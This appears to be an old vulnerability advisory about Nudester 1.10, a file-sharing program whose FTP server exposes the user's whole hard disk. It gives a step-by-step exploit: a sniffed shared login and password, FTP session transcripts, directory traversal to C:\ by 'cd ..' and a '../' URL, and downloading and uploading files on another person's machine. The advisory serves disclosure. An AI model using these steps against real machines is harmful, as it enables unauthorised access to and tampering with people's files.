COMMAND

    Nudester

SYSTEMS AFFECTED

    Nudester 1.10

PROBLEM

    Following  is  based  on  a  Real  Security Advisory #1 by Cyph3r.
    Nudester, a file  sharing program for  porn uses the  FTP protocol
    to transfer files.   The problem is it  gives access to the  whole
    hard disk instead of just the folder containing porn.

    For example, open Nudester, and a sniffer program (like Iris)  and
    download a file from a user on Nudester.  While having the sniffer
    running filtering port 21 inclusive so you can get the password.

        <Sniffed Data>

        220 ICS FTP Server ready
        user NUDESTER
        331 Password required for NUDESTER
        pass NSASTdfg!"#.%&sd3214894231SDFGSD598502534
        230 User NUDESTER logged in

        </Sniffed data>

    Open an ftp client and connect to the ip

        ftp> open ***.***.***.***
        Connected to ***.***.***.***
        220 ICS FTP Server ready.
        User (***.***.***.***:(none)): NUDESTER
        331 Password required for NUDESTER.
        Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534
        230 User NUDESTER logged in.

        - Bingo!

        ftp> dir
        200 Port command successful.
        150 Opening data connection for directory list.
        C:\TEMP\*.* not found
        226 File sent ok
        ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec.
        ftp> cd ..
        250 CWD command successful. "C:/" is current directory.
        ftp> DIR
        200 Port command successful.
        150 Opening data connection for directory list.
        -rw-rw-rw-   1 ftp      ftp         1152 Oct 30  2000 FRUNLOG.TXT
        -rwxrwxrwx   1 ftp      ftp        25473 May 15  1998 MSCDEX.EXE
        -rw-rw-rw-   1 ftp      ftp        10604 May 15  1997 CDROM.SYS
        -rwxrwxrwx   1 ftp      ftp        20135 May 15  1998 KEYB.COM
        -rw-rw-rw-   1 ftp      ftp        34566 May 15  1998 KEYBOARD.SYS
        -rwxrwxrwx   1 ftp      ftp        71102 May 15  1998 EDIT.COM
        -rw-rw-rw-   1 ftp      ftp           38 Oct 16  1998 AUTOEXEC.OLD
        -rw-rw-rw-   1 ftp      ftp           31 Oct 16  1998 CONFIG.OLD
        drw-rw-rw-   1 ftp      ftp            0 Oct 30  2030 ATI
        -rw-rw-rw-   1 ftp      ftp          121 Oct 29  2000 CONFIG.DOS
        -rw-rw-rw-   1 ftp      ftp          113 Oct 29  2000 AUTOEXEC.DOS
        -rw-rw-rw-   1 ftp      ftp          436 Nov 18  2000 AUTOEXEC.BAK
        drw-rw-rw-   1 ftp      ftp            0 Oct 29  2000 WINDOWS
        drw-rw-rw-   1 ftp      ftp            0 Oct 30  2000 WINDOWS.000
        -rw-rw-rw-   1 ftp      ftp         7471 Nov 18  2000 NETLOG.TXT
        -rw-rw-rw-   1 ftp      ftp          172 Nov 15  2000 CONFIG.BAK
        -rw-rw-rw-   1 ftp      ftp         5048 Nov 17  2000 SETUPXLG.TXT
        -rwxrwxrwx   1 ftp      ftp          438 Aug 16 00:43 AUTOEXEC.BAT
        dr--r--r--   1 ftp      ftp            0 Oct 29  2000 Program Files
        -rw-rw-rw-   1 ftp      ftp          172 Nov 18  2000 CONFIG.SYS
        -rw-rw-rw-   1 ftp      ftp        19622 Aug 10 18:50 SCANDISK.LOG
        -rw-rw-rw-   1 ftp      ftp          327 Oct 30  2030 outreg.txt
        -rw-rw-rw-   1 ftp      ftp          339 Oct 30  2030 outreg.ini
        drw-rw-rw-   1 ftp      ftp            0 Oct 30  2030 dcpt
        -rwxrwxrwx   1 ftp      ftp        17129 Oct 30  2030 BOOTDISK.EXE
        -rwxrwxrwx   1 ftp      ftp      2884286 Oct 30  2030 DECOMP.EXE
        -rwxrwxrwx   1 ftp      ftp       265420 Oct 30  2030 DOS4GW.EXE
        -rw-rw-rw-   1 ftp      ftp          507 Oct 30  2030 FILE_ID.DIZ
        -rw-rw-rw-   1 ftp      ftp         2086 Oct 30  2030 HELPME.DOC
        -rw-rw-rw-   1 ftp      ftp         3639 Oct 30  2030 LICENSE.DOC
        -rw-rw-rw-   1 ftp      ftp         1377 Oct 30  2030 ORDER.DOC
        drw-rw-rw-   1 ftp      ftp            0 Nov 02  2000 KPCMS
        -rw-rw-rw-   1 ftp      ftp          386 Nov 02  2000 AUTOEXEC.001
        drw-rw-rw-   1 ftp      ftp            0 Nov 02  2000 psfonts
        -rw-rw-rw-   1 ftp      ftp           25 Nov 03  2000 prompt
        -rwxrwxrwx   1 ftp      ftp        95874 May 05  1999 COMMAND.COM
        drw-rw-rw-   1 ftp      ftp            0 Nov 19  2000 Winzip
        drw-rw-rw-   1 ftp      ftp            0 Dec 10  2000 unzipped
        drw-rw-rw-   1 ftp      ftp            0 Nov 19  2000 Antivirus
        drw-rw-rw-   1 ftp      ftp            0 Dec 16  2000 My Music
        -rw-rw-rw-   1 ftp      ftp          118 Jan 20 00:27 netsig.txt
        drw-rw-rw-   1 ftp      ftp            0 Mar 15 21:05 accelerator
        -rw-rw-rw-   1 ftp      ftp        22721 Aug 17 01:00 winzip.log
        226 File sent ok
        ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec.

    Lets see if we have access to download a file:

        ftp> get netsig.txt
        200 Port command successful.
        150 Opening data connection for netsig.txt.
        226 File sent ok
        ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec.

    Yep, let's try to upload a file

        ftp> put c:\temp.txt
        200 Port command successful.
        150 Opening data connection for TEMP.TXT.
        226 File received ok

    Anyone  can  gain  full  access  to  Nudester  user's  files;  the
    username is the same for every user.  However the password is  not
    the  same,  you  will  have  to  sniff while downloading a file to
    retrieve the password.

    You can gain full ftp access  without a password.  Just log  in to
    the person running nudester  using any l/p and  there you go.   If
    you are using  IE to browse  files you cannot  directly view other
    folders.  The workaround is simple:

        ftp://127.0.0.0/../

    will give you C:\ (the directory you start in is c:\temp).   Dunno
    if You can  upload files using  this method, but  you can download
    and view folders/files.   Using an ftp prog  such as the one  that
    comes with windows will allow full access.

SOLUTION

    The only solution  to this problem  is not to  use Nudester.   And
    find yourself a girl.